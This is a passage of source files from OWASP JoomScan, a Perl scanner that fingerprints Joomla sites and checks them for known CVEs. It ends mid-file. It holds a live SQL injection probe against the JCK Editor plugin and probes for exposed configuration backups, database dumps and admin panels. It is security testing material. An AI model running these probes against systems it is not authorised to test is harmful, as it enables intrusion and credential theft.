33 | 1.6,1.7,2.5.0,2.5.1,2.5.2|Joomla! 1.6/1.7/2.5 privilege escalation vulnerability\nCVE : CVE-2012-1563\nEDB : https://www.exploit-db.com/exploits/41156/
34 | 3.2.2|Joomla! v3.2.2 SQL injection\nhttps://developer.joomla.org/security/578-20140301-core-sql-injection.html
35 | 2.5.10,2.5.11,2.5.12,2.5.13,2.5.14,2.5.15,2.5.16,2.5.17,2.5.18,2.5.19,2.5.20,2.5.21,2.5.22,2.5.23,2.5.24,2.5.25,2.5.4,2.5.5,2.5.6,2.5.7,2.5.8,2.5.9,3.0.0,3.0.1,3.0.2,3.0.3,3.0.4,3.1.0,3.1.1,3.1.2,3.1.3,3.1.4,3.1.5,3.1.6,3.2.0,3.2.1,3.2.2,3.2.3,3.2.4,3.2.5,3.3.0,3.3.1,3.3.2,3.3.3,3.3.4|Joomla! Component Akeeba Kickstart - Unserialize Remote Code Execution\nCVE : CVE-2014-7228\nEDB : https://www.exploit-db.com/exploits/35033/
36 | 2.5.4,2.5.3,2.5.2,2.5.1,2.5.0|Joomla! 'media.php' Arbitrary File Upload Vulnerability\nCVE : CVE-2013-5576\nEDB : https://www.exploit-db.com/exploits/27610/
37 | 1.5.0|Joomla! 1.5.0 Beta - 'pcltar.php' Remote File Inclusion\nCVE : CVE-2007-2199\nEDB : https://www.exploit-db.com/exploits/3781/
38 | 1.5.8|Joomla! Component xstandard editor 1.5.8 - Local Directory Traversal\nCVE : CVE-2009-0113\nEDB : https://www.exploit-db.com/exploits/7691/
39 | 3.4.4|Joomla! 3.4.4 Component Content History - SQL Injection / Remote Code Execution (Metasploit)\nCVE : CVE-2015-7297 , CVE-2015-7857 , CVE-2015-7858 \nEDB : https://www.exploit-db.com/exploits/38797/
40 | 2.5.7,2.5.6,2.5.5,2.5.4,2.5.3,2.5.2,2.5.1|Joomla! Clickjacking Security Bypass Vulnerability\nCVE : CVE-2012-5827\nhttps://developer.joomla.org/security/news/543-20121101-core-clickjacking.html\nhttps://developer.joomla.org/security/news/544-20121102-core-clickjacking.html
41 | 3.0.1|Joomla! Unspecified Information Disclosure Vulnerability\nCVE : CVE-2013-1454\nhttp://www.securityfocus.com/bid/57752
42 | 3.0.1|Joomla! Unspecified Information Disclosure Vulnerability\nCVE : CVE-2013-1455\nhttp://www.securityfocus.com/bid/57751\nhttps://developer.joomla.org/security-centre/549-20130202-core-information-disclosure.html
43 | 3.0.3,3.0.1,3.0.02.5.9,2.5.8,2.5.7,2.5.6,2.5.5,2.5.4,2.5.3,2.5.2,2.5.1,2.5.0|Joomla! Highlighter Plugin Unspecified Cross-Site Scripting Vulnerability\nCVE : CVE-2013-3267 \nhttps://developer.joomla.org/security/86-20130407-core-xss-vulnerability.html
44 | 2.5.4,2.5.3,2.5.2,2.5.1|Joomla! Security Bypass Vulnerability\nCVE : CVE-2013-3056\nhttp://www.securityfocus.com/bid/59490/info
45 | 2.5.4,2.5.3,2.5.2,2.5.1|Joomla! Information Disclosure Vulnerability\nCVE : CVE-2013-3057\nhttp://www.securityfocus.com/bid/59489\nhttp://developer.joomla.org/security/82-20130402-core-information-disclosure.html
46 | 3.0.3,3.0.1,3.0.02.5.9,2.5.8,2.5.7,2.5.6,2.5.5,2.5.4,2.5.3,2.5.2,2.5.1|Joomla! Unspecified Cross-Site Scripting Vulnerability\nCVE : CVE-2013-3058\nhttp://www.securityfocus.com/bid/59483\nhttp://developer.joomla.org/security/81-20130403-core-xss-vulnerability.html
47 | 3.0.3,3.0.1,3.0.02.5.9,2.5.8,2.5.7,2.5.6,2.5.5,2.5.4,2.5.3,2.5.2,2.5.1|Joomla! Unspecified Cross-Site Scripting Vulnerability\nCVE : CVE-2013-3059\nhttps://developer.joomla.org/security/80-20130405-core-xss-vulnerability.html
48 | 3.3.3,3.3.0,3.2.4,3.2.3,3.2.2,3.2.1,3.2.0|Joomla! Cross Site Scripting Vulnerability\nCVE : Core CVE-2014-6631\nhttps://developer.joomla.org/security/593-20140901-core-xss-vulnerability.html
49 | 3.3.3,3.3,3.2.4,3.2.3,3.2.2,3.2.1,3.1.6,3.1.5,3.1.4,3.1.1,3.1.0,3.0.4,3.0.3,3.0.1,2.5.24,2.5.19,2.5.18,2.5.17,2.5.16,2.5.15,2.5.14,2.5.13,2.5.11,2.5.10,2.5.9,2.5.8,2.5.7,2.5.6,2.5.5,2.5.4,2.5.3,2.5.2,2.5.1,2.5.0,3.2.0|Joomla! Core  Authentication Bypass Vulnerability\nCVE :CVE-2014-6632\nhttp://developer.joomla.org/security/594-20140902-core-unauthorised-logins.html
50 | 3.3.4,3.3.3,3.3.0,3.2.5,3.2.4,3.2.3,3.2.2,3.2.1,3.1.6,3.1.5,3.1.4,3.1.1,3.1.0,3.0.4,3.0.3,3.0.1,3.0.0,2.5.25,2.5.24,2.5.19,2.5.18,2.5.17,2.5.16,2.5.15,2.5.14,2.5.13,2.5.11,2.5.10,2.5.9,2.5.8,2.5.7,2.5.6,2.5.5,2.5.4,3.2.0|Joomla! Core Remote Denial of Service Vulnerability\nCVE : CVE-2014-7229\nhttps://developer.joomla.org/security/596-20140904-core-denial-of-service.html
51 | 3.4.1,3.4.0,3.3.6,3.3.5,3.3.4,3.3.3,3.3.2,3.3.1,3.3.0,3.2.6,3.2.5,3.2.4,3.2.3,3.2.2,3.2.1,3.1.6,3.1.5,3.1.4,3.1.1,3.1.0,3.0.4,3.0.3,3.0.1,3.0.0,3.2.0|Joomla! Open Redirection Vulnerability\nCVE : CVE-2015-5608\nhttp://www.securityfocus.com/bid/76496
52 | 3.4.1,3.4.0,3.3.6,3.3.5,3.3.4,3.3.3,3.3.2,3.3.1,3.3.0,3.2.6,3.2.5,3.2.4,3.2.3,3.2.2,3.2.1,3.2.0|Joomla! Cross Site Request Forgery Vulnerability\nCVE : CVE-2015-5397\nhttps://developer.joomla.org/security-centre/618-20150602-core-remote-code-execution.html
53 | 3.4.3,3.4.2,3.4.1,3.4.0|Joomla! Core Cross Site Scripting Vulnerability\nCVE : CVE-2015-6939\nhttp://packetstormsecurity.com/files/133907/Joomla-CMS-3.4.3-Cross-Site-Scripting.html\nhttps://developer.joomla.org/security-centre/626-20150908-core-xss-vulnerability.html
54 | 3.4.4,3.4.3,3.4.2,3.4.1,3.4.0,3.3.6,3.3.5,3.3.4,3.3.3,3.3.2,3.3.1,3.3.0,3.2.6,3.2.5,3.2.4,3.2.3,3.2.2,3.2.1,3.2.0|Joomla! Core Security Bypass Vulnerability\nCVE : CVE-2015-7859\nhttps://developer.joomla.org/security-centre/629-20151002-core-acl-violations.html
55 | 3.4.4,3.4.3,3.4.2,3.4.1,3.4.0,3.3.6,3.3.5,3.3.4,3.3.3,3.3.2,3.3.1,3.3.0,3.2.6,3.2.5,3.2.4,3.2.3,3.2.2,3.2.1,3.4.5,3.2.0|Joomla! Directory Traversal Vulnerability\nCVE : CVE-2015-8565\nhttps://developer.joomla.org/security-centre/635-20151214-core-directory-traversal-2.html
56 | 3.4.4,3.4.3,3.4.2,3.4.1,3.4.0,3.4.5|Joomla! Directory Traversal Vulnerability\nCVE : CVE-2015-8564\nhttps://developer.joomla.org/security-centre/634-20151214-core-directory-traversal.html
57 | 3.4.4,3.4.3,3.4.2,3.4.1,3.4.0,3.3.6,3.3.5,3.3.4,3.3.3,3.3.2,3.3.1,3.3.0,3.2.6,3.2.5,3.2.4,3.2.3,3.2.2,3.2.1,3.4.5,3.2.0|Joomla! Core Cross Site Request Forgery Vulnerability\nCVE : CVE-2015-8563\nhttps://developer.joomla.org/security-centre/633-20151214-core-csrf-hardening.html
58 | 3.4.7,3.4.6,3.4.4,3.3.5,3.6.3,3.6.1,3.6.0,3.4.5|Joomla! Core Security Bypass Vulnerability\nCVE : CVE-2016-9081\nhttps://developer.joomla.org/security-centre/661-20161003-core-account-modifications.html
59 | 3.4.7,3.4.6,3.4.4,3.6.4,3.6.3,3.6.1,3.6.0,3.4.5|Joomla! Core Arbitrary File Upload Vulnerability\nCVE : CVE-2016-9836\nhttps://developer.joomla.org/security-centre/665-20161202-core-shell-upload.html
60 | 3.4.7,3.4.6,3.4.4,3.4.3,3.4.2,3.4.1,3.4.0,3.3.6,3.3.5,3.3.4,3.3.3,3.3.2,3.3.1,3.3.0,3.2.6,3.2.5,3.2.4,3.2.3,3.2.2,3.2.1,3.1.6,3.1.5,3.1.4,3.1.1,3.1.0,3.0.4,3.0.3,3.0.1,3.0.0,3.6.4,3.6.3,3.6.1,3.6.0,3.4.5,3.2.0|Joomla! Information Disclosure Vulnerability\nCVE : CVE-2016-9837\nhttps://developer.joomla.org/security-centre/666-20161203-core-information-disclosure.html
61 | 3.6.5,3.4.7,3.4.6,3.4.4,3.4.3,3.4.2,3.4.1,3.4.0,3.3.6,3.3.5,3.3.4,3.3.3,3.3.2,3.3.1,3.30.0,3.2.6,3.2.5,3.2.4,3.2.3,3.2.2,3.2.1,3.1.6,3.1.5,3.1.4,3.1.1,3.10.0,3.0.4,3.0.3,3.0.1,3.0.0,2.5.26,2.5.25,2.5.24,2.5.19,2.5.18,2.5.17,2.5.16,2.5.15,2.5.14,2.5.13,2.5.11,2.5.10,2.5.9,2.5.8,2.5.7,2.5.6,2.5.5,2.5.4,2.5.3,2.5.2,2.5.1,2.5.0,1.7.5,1.7.4,1.7.3,1.7.2,1.7.1,1.7.0,1.6.6,1.6.4,1.6.3,1.6.2,1.6.1,1.6.0,3.6.4,3.6.3,3.6.1,3.6.0,3.4.5,3.2.0,2.5.0,1.7.0,1.6.5|PHPMailer Remote Code Execution Vulnerability\nCVE : CVE-2016-10033\nhttps://www.rapid7.com/db/modules/exploit/multi/http/phpmailer_arg_injection\nhttps://github.com/opsxcq/exploit-CVE-2016-10033\nEDB : https://www.exploit-db.com/exploits/40969/
62 | 3.6.5,3.4.7,3.4.6,3.4.4,3.4.3,3.4.2,3.4.1,3.4.0,3.3.6,3.3.5,3.3.4,3.3.3,3.3.2,3.3.1,3.30.0,3.2.6,3.2.5,3.2.4,3.2.3,3.2.2,3.2.1,3.1.6,3.1.5,3.1.4,3.1.1,3.10.0,3.0.4,3.0.3,3.0.1,3.0.0,2.5.26,2.5.25,2.5.24,2.5.19,2.5.18,2.5.17,2.5.16,2.5.15,2.5.14,2.5.13,2.5.11,2.5.10,2.5.9,2.5.8,2.5.7,2.5.6,2.5.5,2.5.4,2.5.3,2.5.2,2.5.1,2.5.0,1.7.5,1.7.4,1.7.3,1.7.2,1.7.1,1.7.0,1.6.6,1.6.4,1.6.3,1.6.2,1.6.1,1.6.0,3.6.4,3.6.3,3.6.1,3.6.0,3.4.5,3.2.0,2.5.0,1.7.0,1.6.5|PPHPMailer Incomplete Fix Remote Code Execution Vulnerability\nCVE : CVE-2016-10045\nhttps://www.rapid7.com/db/modules/exploit/multi/http/phpmailer_arg_injection\nEDB : https://www.exploit-db.com/exploits/40969/
63 | 3.7.1|Joomla Component Fields - SQLi Remote Code Execution\nCVE : CVE-2017-8917\nhttps://www.securityfocus.com/bid/98515\nhttps://www.joomla.org/announcements/release-news/5705-joomla-3-7-1-release.html\nEDB : https://www.exploit-db.com/exploits/44358/


--------------------------------------------------------------------------------
/exploit/jckeditor.pl:
--------------------------------------------------------------------------------
1 | #start jckeditor plugin exploit Checker
2 | $source=$ua->get("$target/plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent=\"%20UNION%20SELECT%20NULL,NULL,0x54683173317374337374,NULL,NULL,NULL,NULL,NULL--%20aa")->decoded_content;
3 | if ($source =~ /Th1s1st3st/g) {
4 | 	dprint("Checking module: jckeditor");
5 | 	tprint("Joomla Component JCK Editor 6.4.4 - 'parent' SQL Injection\nPOC: $target/plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent=\"%20UNION%20SELECT%20NULL,NULL,0x54683173317374337374,NULL,NULL,NULL,NULL,NULL--%20aa\nEDB : https://www.exploit-db.com/exploits/45423/\n");
6 | }
7 | #end jckeditor plugin exploit Checker


--------------------------------------------------------------------------------
/exploit/verexploit.pl:
--------------------------------------------------------------------------------
 1 | #start 
 2 | dprint("Core Joomla Vulnerability");
 3 | open(my $DB,"$mepath/exploit/db/corevul.txt");
 4 | my $vver=substr($ver, index($ver, ' ')+1, 6);
 5 | $vver =~ s/ //g;
 6 | while( my $row = <$DB>)  {
 7 |     chomp $row;
 8 |     my $fv=substr($row, 0, index($row, '|'));
 9 |     my $fd=substr($row, index($row, '|')+1, 1000);
10 |     my @sbug = split /,/, $fv;
11 |     foreach $bs(@sbug){
12 |         if(($bs =~ m/$vver/i) && (substr($vver, 0, 1) eq substr($bs, 0, 1))){
13 |         $fd =~ s/\$target/$target/g;
14 |             $fd =~ s/\\n/\r\n/g;
15 |             $fd =~ s/\|/\r\n\r\n/g;
16 |             $vtmp.="$fd\n\n";
17 |             $vvtf=1;
18 |             last;
19 |         }
20 |     }
21 | }
22 | if($vvtf==1){tprint("$vtmp");}else{fprint("Target Joomla core is not vulnerable");}
23 | 
24 | close $DB;


--------------------------------------------------------------------------------
/joomscan.pl:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/perl
 2 | #
 3 | #            --------------------------------------------------
 4 | #                            OWASP JoomScan
 5 | #            --------------------------------------------------
 6 | #        Copyright (C) <2018>
 7 | #
 8 | #        This program is free software: you can redistribute it and/or modify
 9 | #        it under the terms of the GNU General Public License as published by
10 | #        the Free Software Foundation, either version 3 of the License, or
11 | #        any later version.
12 | #
13 | #        This program is distributed in the hope that it will be useful,
14 | #        but WITHOUT ANY WARRANTY; without even the implied warranty of
15 | #        MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
16 | #        GNU General Public License for more details.
17 | #
18 | #        You should have received a copy of the GNU General Public License
19 | #        along with this program.  If not, see <http://www.gnu.org/licenses/>.
20 | #
21 | #
22 | 
23 | 
24 | $author="Mohammad Reza Espargham , Ali Razmjoo";$author.="";
25 | $version="0.0.7";$version.="";
26 | $codename="Self Challenge";$codename.="";
27 | $update="2018/09/23";$update.="";
28 | $mmm=0;
29 | 
30 | system(($^O eq 'MSWin32') ? 'cls' : 'clear');
31 | use if $^O eq "MSWin32", Win32::Console::ANSI;
32 | use Term::ANSIColor;
33 | use Getopt::Long;
34 | use LWP;
35 | use LWP::UserAgent;
36 | use LWP::Simple;
37 | use Cwd;                                                                       
38 | $mepath = Cwd::realpath($0); $mepath =~ s#/[^/\\]*$##; 
39 | $SIG{INT} = \&interrupt;
40 | sub interrupt {
41 |     fprint("\nShutting Down , Interrupt by user");
42 |     do "$mepath/core/report.pl" if($noreport!=1);
43 |     print color("reset");
44 |     exit 0;
45 | }
46 | 
47 | do "$mepath/core/header.pl";
48 | 
49 | if ($urlfile) {
50 |    open(my $ufh, '<:encoding(UTF-8)', $urlfile)
51 |      or die "Could not open file '$urlfile' $!";
52 |     
53 |    while (my $row = <$ufh>) {
54 |      chomp $row;
55 |      $target = $row;
56 |      run_checks(0);
57 |    }   
58 | } else {
59 |    run_checks(0);
60 | }
61 | 
62 | sub run_checks {
63 | 
64 |    do "$mepath/core/main.pl";
65 |    
66 |    if($jversion!=1) {
67 |       do "$mepath/modules/waf_detector.pl";
68 |       do "$mepath/exploit/jckeditor.pl";
69 |    }
70 |    
71 |    do "$mepath/core/ver.pl";
72 |    if($jversion!=1) {
73 |       
74 |       do "$mepath/exploit/verexploit.pl"; 
75 |       do "$mepath/exploit/com_lfd.pl";
76 |       do "$mepath/modules/pathdisclure.pl";
77 |       do "$mepath/modules/debugmode.pl";
78 |       do "$mepath/modules/dirlisting.pl"; 
79 |       do "$mepath/modules/missconfig.pl";
80 |       do "$mepath/modules/cpfinder.pl"; 
81 |       do "$mepath/modules/robots.pl"; 
82 |       do "$mepath/modules/backupfinder.pl"; 
83 |       do "$mepath/modules/errfinder.pl"; 
84 |       do "$mepath/modules/reg.pl"; 
85 |       do "$mepath/modules/configfinder.pl"; 
86 |       do "$mepath/exploit/components.pl" if($components==1);
87 | 
88 |    }
89 | 
90 |    do "$mepath/core/report.pl" if($noreport!=1);
91 |    print color("reset");
92 | 
93 | }
94 | 
95 | 


--------------------------------------------------------------------------------
/love.txt:
--------------------------------------------------------------------------------
 1 |                                                                                                
 2 |                     ,dPYb, ,dPYb,                                                              
 3 |                     IP'`Yb IP'`Yb                                                              
 4 |                     I8  8I I8  8I                                                              
 5 |                     I8  8' I8  8'                                                              
 6 |    ,g,      ,ggg,   I8 dP  I8 dP                                                               
 7 |   ,8'8,    i8" "8i  I8dP   I8dP                                                                
 8 |  ,8'  Yb   I8, ,8I  I8P    I8P                                                                 
 9 | ,8'_   8)  `YbadP' ,d8b,_ ,d8b,_                                                               
10 | P' "YY8P8P888P"Y8888P'"Y88PI8"8888                                                             
11 |                            I8 `8,                                                              
12 |                            I8  `8,                                                             
13 |                            I8   8I                                                             
14 |                            I8   8I                                                             
15 |                            I8, ,8'                                                             
16 |                             "Y8P'                                                              
17 |                                                                                                
18 |                ,dPYb,                 ,dPYb, ,dPYb,                                            
19 |                IP'`Yb                 IP'`Yb IP'`Yb                                            
20 |                I8  8I                 I8  8I I8  8I                                            
21 |                I8  8'                 I8  8' I8  8'                                            
22 |        ,gggg,  I8 dPgg,     ,gggg,gg  I8 dP  I8 dP   ,ggg,    ,ggg,,ggg,     ,gggg,gg   ,ggg,  
23 |       dP"  "Yb I8dP" "8I   dP"  "Y8I  I8dP   I8dP   i8" "8i  ,8" "8P" "8,   dP"  "Y8I  i8" "8i 
24 |      i8'       I8P    I8  i8'    ,8I  I8P    I8P    I8, ,8I  I8   8I   8I  i8'    ,8I  I8, ,8I 
25 |     ,d8,_    _,d8     I8,,d8,   ,d8b,,d8b,_ ,d8b,_  `YbadP' ,dP   8I   Yb,,d8,   ,d8I  `YbadP' 
26 |     P""Y8888PP88P     `Y8P"Y8888P"`Y88P'"Y888P'"Y88888P"Y8888P'   8I   `Y8P"Y8888P"888888P"Y888
27 |                                                                                  ,d8I'         
28 |                                                                                ,dP'8I          
29 |                                                                               ,8"  8I          
30 |                                                                               I8   8I          
31 |                                                                               `8, ,8I          
32 |                                                                                `Y8P"          


--------------------------------------------------------------------------------
/modules/backupfinder.pl:
--------------------------------------------------------------------------------
 1 | #start find backup
 2 | $btf=0;
 3 | dprint("Finding common backup files name");
 4 | @backups = ('1.txt','2.txt','1.gz','1.rar','1.save','1.tar','1.tar.bz2','1.tar.gz','1.tgz','1.tmp','1.zip','2.back','2.backup','2.gz','2.rar','2.save','2.tar','2.tar.bz2','2.tar.gz','2.tgz','2.tmp','2.zip','backup.back','backup.backup','backup.bak','backup.bck','backup.bkp','backup.copy','backup.gz','backup.old','backup.orig','backup.rar','backup.sav','backup.save','backup.sql~','backup.sql.back','backup.sql.backup','backup.sql.bak','backup.sql.bck','backup.sql.bkp','backup.sql.copy','backup.sql.gz','backup.sql.old','backup.sql.orig','backup.sql.rar','backup.sql.sav','backup.sql.save','backup.sql.tar','backup.sql.tar.bz2','backup.sql.tar.gz','backup.sql.tgz','backup.sql.tmp','backup.sql.txt','backup.sql.zip','backup.tar','backup.tar.bz2','backup.tar.gz','backup.tgz','backup.txt','backup.zip','database.back','database.backup','database.bak','database.bck','database.bkp','database.copy','database.gz','database.old','database.orig','database.rar','database.sav','database.save','database.sql~','database.sql.back','database.sql.backup','database.sql.bak','database.sql.bck','database.sql.bkp','database.sql.copy','database.sql.gz','database.sql.old','database.sql.orig','database.sql.rar','database.sql.sav','database.sql.save','database.sql.tar','database.sql.tar.bz2','database.sql.tar.gz','database.sql.tgz','database.sql.tmp','database.sql.txt','database.sql.zip','database.tar','database.tar.bz2','database.tar.gz','database.tgz','database.tmp','database.txt','database.zip','joom.back','joom.backup','joom.bak','joom.bck','joom.bkp','joom.copy','joom.gz','joomla.back','Joomla.back','joomla.backup','Joomla.backup','joomla.bak','Joomla.bak','joomla.bck','Joomla.bck','joomla.bkp','Joomla.bkp','joomla.copy','Joomla.copy','joomla.gz','Joomla.gz','joomla.old','Joomla.old','joomla.orig','Joomla.orig','joomla.rar','Joomla.rar','joomla.sav','Joomla.sav','joomla.save','Joomla.save','joomla.tar','Joomla.tar','joomla.tar.bz2','Joomla.tar.bz2','joomla.tar.gz','Joomla.tar.gz','joomla.tgz','Joomla.tgz','joomla.zip','Joomla.zip','joom.old','joom.orig','joom.rar','joom.sav','joom.save','joom.tar','joom.tar.bz2','joom.tar.gz','joom.tgz','joom.zip','site.back','site.backup','site.bak','site.bck','site.bkp','site.copy','site.gz','site.old','site.orig','site.rar','site.sav','site.save','site.tar','site.tar.bz2','site.tar.gz','site.tgz','site.zip','sql.zip.back','sql.zip.backup','sql.zip.bak','sql.zip.bck','sql.zip.bkp','sql.zip.copy','sql.zip.gz','sql.zip.old','sql.zip.orig','sql.zip.save','sql.zip.tar','sql.zip.tar.bz2','sql.zip.tar.gz','sql.zip.tgz','upload.back','upload.backup','upload.bak','upload.bck','upload.bkp','upload.copy','upload.gz','upload.old','upload.orig','upload.rar','upload.sav','upload.save','upload.tar','upload.tar.bz2','upload.tar.gz','upload.tgz','upload.zip');
 5 | foreach $back(@backups){
 6 |     if (($content_type, $doc_length, $mod_time, $expires, $server) =head("$target/$back")){
 7 |         if($content_type !~ m/text\/html/i){
 8 |             tprint("Backup file is found \nPath : $target/$back\n");
 9 |            $btf=1;
10 |         }
11 |     }
12 | }
13 | if($btf==0){
14 |     fprint("Backup files are not found");
15 | }
16 | #end find backup
17 | 


--------------------------------------------------------------------------------
/modules/configfinder.pl:
--------------------------------------------------------------------------------
 1 | #start config.php.x check
 2 | 
 3 | $ctf=0;
 4 | dprint("Checking sensitive config.php.x file");
 5 | @configs = ('configuration.php_old','configuration.php_new','configuration.php~','configuration.php.new','configuration.php.new~','configuration.php.old','configuration.php.old~','configuration.bak','configuration.php.bak','configuration.php.bkp','configuration.txt','configuration.php.txt','configuration - Copy.php','configuration.php.swo','configuration.php_bak','configuration.php#','configuration.orig','configuration.php.save','configuration.php.original','configuration.php.swp','configuration.save','.configuration.php.swp','configuration.php1','configuration.php2','configuration.php3','configuration.php4','configuration.php4','configuration.php6','configuration.php7','configuration.phtml','configuration.php-dist');
 6 | 
 7 | my $cnftmp="";
 8 | foreach $config(@configs){
 9 |     $source=$ua->get("$target/$config")->decoded_content;
10 |     if($source =~ m/public \$ftp_pass/i || $source =~ m/\$dbtype/i || $source =~ m/force_ssl/i || $source =~ m/mosConfig_secret/i || $source =~ m/mosConfig_dbprefix/i ){
11 |         $cnftmp="$cnftmp\Readable config file is found \n config file path : $target/$config\n";
12 |         $ctf=1;
13 |     }
14 | }
15 | if($ctf==0){
16 |     fprint("Readable config files are not found");
17 | }else{
18 |     tprint($cnftmp);
19 | }
20 | #end config.php.x check
21 | 


--------------------------------------------------------------------------------
/modules/cpfinder.pl:
--------------------------------------------------------------------------------
 1 | #start admin finder
 2 | dprint("admin finder");
 3 | 
 4 | $amtf=0;
 5 | @admins = ('administrator','admin','panel','webadmin','modir','manage','administration','joomla/administrator','joomla/admin');
 6 | foreach $admin(@admins){
 7 |     $source=$ua->get("$target/$admin/");
 8 |     if($source->code=~200 or $source->code=~403 or $source->code=~500 or $source->code=~501){
 9 |         $amtf=1;
10 |         $adming=$admin;
11 |         last;
12 |     }
13 | }
14 | 
15 | 
16 | if($amtf==1){
17 |     tprint("Admin page : $target/$adming/");
18 | }else{
19 |     fprint("Admin page not found");
20 | }
21 | 
22 | #end admin finder


--------------------------------------------------------------------------------
/modules/debugmode.pl:
--------------------------------------------------------------------------------
 1 | #start Debug Mode Checker
 2 | 
 3 | $source=$ua->get("$target/")->decoded_content;
 4 | if ($source =~ /Joomla\! Debug Console/g or $source =~ /xdebug\.org\/docs\/all_settings/g) {
 5 | 	dprint("Checking Debug Mode status");
 6 | 	tprint("Debug mode Enabled : $target/");
 7 | }
 8 | 
 9 | #end Debug Mode Checker
10 | 
11 | 


--------------------------------------------------------------------------------
/modules/dirlisting.pl:
--------------------------------------------------------------------------------
 1 | #start Directory Listing
 2 | 
 3 | $ctf=0;
 4 | @dirl = ('administrator/components','components','administrator/modules','modules','administrator/templates','templates','cache','images','includes','language','media','templates','tmp','images/stories','images/banners');
 5 | 
 6 | my $cnftmp="";
 7 | foreach $dir(@dirl){
 8 | 	$source=$ua->get("$target/$dir/")->decoded_content;
 9 | 	if ($source =~ /<title>Index of/g or $source =~ /Last modified<\/a>/g) {
10 | 		$cnftmp="$cnftmp$target/$dir\n";
11 | 		$ctf=1;
12 | 	}
13 | }
14 | if($ctf==1){
15 | 	dprint("Checking Directory Listing");
16 | 	tprint("directory has directory listing : \n$cnftmp");
17 | }
18 | 
19 | #end Directory Listing
20 | 


--------------------------------------------------------------------------------
/modules/errfinder.pl:
--------------------------------------------------------------------------------
 1 | #start Checking common logs
 2 | dprint("Finding common log files name");
 3 | $ertf=0;
 4 | @error = ('error.log','error_log','php-scripts.log','php.errors','php5-fpm.log','php_errors.log','debug.log','security.txt','.well-known/security.txt');
 5 | foreach $er(@error){
 6 |     if (($content_type, $doc_length, $mod_time, $expires, $server) =head("$target/$er")){
 7 |         if($content_type !~ m/text\/html/i){
 8 |             tprint("$er path :  $target/$er\n");
 9 |            $ertf=1;
10 |         }
11 |     }
12 | }
13 | if($ertf==0) {
14 |     fprint("error log is not found");
15 | }
16 | #end Checking common logs


--------------------------------------------------------------------------------
/modules/missconfig.pl:
--------------------------------------------------------------------------------
 1 | #start missconfig check
 2 | $ctf=0;
 3 | dprint("Checking apache info/status files");
 4 | @configs = ('server-status','server-info');
 5 | foreach $config(@configs){
 6 | 	$source=$ua->get("$target/$config")->decoded_content;
 7 | 	if($source =~ m/Apache Server Information/i || $source =~ m/Server Root/i || $source =~ m/Apache Status/i){
 8 | 		tprint("Interesting file is found \n$target/$config");
 9 | 		$ctf=1;
10 | 	}
11 | }
12 | if($ctf==0){
13 | 	fprint("Readable info/status files are not found");
14 | }
15 | 
16 | #end missconfig check


--------------------------------------------------------------------------------
/modules/pathdisclure.pl:
--------------------------------------------------------------------------------
 1 | #start path disclosure
 2 | 
 3 | @plinks = ("mambo/mambots/editors/mostlyce/jscripts/tiny_mce/plugins/spellchecker/classes/PSpellShell.php","components/com_docman/dl2.php?archive=0&file=","libraries/joomla/utilities/compat/php50x.php","libraries/joomla/client/ldap.php","libraries/joomla/html/html/content.php","libraries/phpmailer/language/phpmailer.lang-joomla.php","libraries/phpxmlrpc/xmlrpcs.php","libraries/joomla/utilities/compat/php50x.php","index.php?option=com_jotloader§ion[]=","index.php?option=com_jotloader§ion[]=",'plugins/content/clicktocall/clicktocall.php','/index.php?option=com_remository&Itemid=53&func=[]select&id=5');
 4 | foreach $plink(@plinks){
 5 |     $source=$ua->get("$target/$plink")->decoded_content;
 6 |     if($source =~ m/Cannot modify header information/i || $source =~ m/trim()/i || $source =~ m/header already sent/i || $source =~ m/Fatal error/i || $source =~ m/errno/i || $source =~ m/Warning: /i){
 7 |         $pathdis="";
 8 |         $source =~ /array given in (.*?) on line/;
 9 |         $pathdis=$1;
10 |         if($pathdis !~ ""){
11 |             $source =~ /array given in (.*?) on line /;
12 |             $pathdis=$1;
13 |         }
14 |         if($pathdis !~ ""){
15 |             $source =~ /occurred in (.*?) in line /;
16 |             $pathdis=$1;
17 |         }
18 |         if($pathdis !~ ""){
19 |             $source =~ /occurred in (.*?) on line/;
20 |             $pathdis=$1;
21 |         }
22 |         if($pathdis !~ ""){
23 |             $source =~ /on a non-object in (.*?) on line/;
24 |             $pathdis=$1;
25 |         }
26 |         if($pathdis !~ ""){
27 |             $source =~ /on a non-object in (.*?) in line/;
28 |             $pathdis=$1;
29 |         }
30 |         if($pathdis !~ ""){
31 |             $source =~ /No such file or directory (errno 2) in (.*?) on line/;
32 |             $pathdis=$1;
33 |         }    
34 |         if($pathdis !~ ""){
35 |             $source =~ /No such file or directory in (.*?) in line/;
36 |             $pathdis=$1;
37 |         }
38 |         if($pathdis !~ ""){
39 |             $source =~ /not found in (.*?) in line/;
40 |             $pathdis=$1;
41 |         }
42 |         if($pathdis !~ ""){
43 |             $source =~ /not found in (.*?) on line/;
44 |             $pathdis=$1;
45 |         }
46 |    
47 |          $pathdis =~ s/<b>//g;
48 |          $pathdis =~ s/<\/b>//g;
49 |          $pathdis =~ s/<strong>//g;
50 |          $pathdis =~ s/<\/strong>//g;
51 |         dprint("Full Path Disclosure (FPD)");
52 |         tprint("Full Path Disclosure (FPD) in '$target/$plink' : $pathdis\n");
53 |         goto pend;
54 |     }
55 | }
56 | pend:;
57 | 
58 | #end path disclosure


--------------------------------------------------------------------------------
/modules/reg.pl:
--------------------------------------------------------------------------------
1 | #start registration
2 | $source=$ua->get("$target/index.php?option=com_users&view=registration")->decoded_content;
3 | if ($source =~ /registration.register/g or $source =~ /jform_password2/g or $source =~ /jform_email2/g) {
4 | 	dprint("Checking user registration");
5 | 	tprint("registration is enabled\n$target/index.php?option=com_users&view=registration");
6 | }
7 | #end registration


--------------------------------------------------------------------------------
/modules/robots.pl:
--------------------------------------------------------------------------------
 1 | #start robots.txt module
 2 | dprint("Checking robots.txt existing");
 3 | $response=$ua->get("$target/robots.txt");
 4 | my $headers  = $response->headers();
 5 | my $content_type =$headers->content_type();
 6 | if ($response->status_line =~ /200/g and $content_type =~ /text\/plain/g) {
 7 | 	$source=$response->decoded_content;
 8 | 	my @lines = split /\n/, $source;
 9 | 	$probot="";
10 | 	foreach my $line( @lines ) { 
11 | 		if($line =~ /llow:/g){
12 | 			$between=substr($line, index($line, ': ')+2, 99999);
13 | 			$probot.="$target$between\n";
14 | 		}
15 | 	}
16 | 	tprint("robots.txt is found\npath : $target/robots.txt \n\nInteresting path found from robots.txt\n$probot");
17 | }else{
